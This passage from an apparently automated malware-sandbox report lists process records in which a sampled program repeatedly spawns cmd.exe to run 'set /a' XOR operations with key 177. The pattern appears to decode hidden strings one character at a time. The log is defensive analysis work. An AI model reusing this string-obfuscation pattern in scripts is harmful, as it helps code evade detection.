                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:23
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "139^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:24
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:25
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "139^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:26
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:27
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "242^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:28
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:29
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "195^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:30
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:31
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "212^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:32
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:33
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "208^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:34
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:35
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "197^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:36
                                    Start time:13:38:24
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:37
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "212^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:38
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:39
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "247^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:40
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:41
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:0x7ff7a6e80000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:42
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:43
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "221^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:44
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:45
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "212^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:46
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:47
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "240^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:48
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:49
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "153^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:50
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:51
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "220^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:52
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:53
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:54
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:55
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "195^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:56
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:57
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "133^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:58
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:59
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:60
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:61
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:62
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:63
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:64
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:65
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:66
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:67
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:68
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:69
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:71
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:72
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "201^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:73
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:74
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "137^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:75
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:76
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:77
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:78
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:79
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:80
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:81
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:82
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:83
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:84
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:85
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:86
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:87
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:88
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:89
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:90
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:91
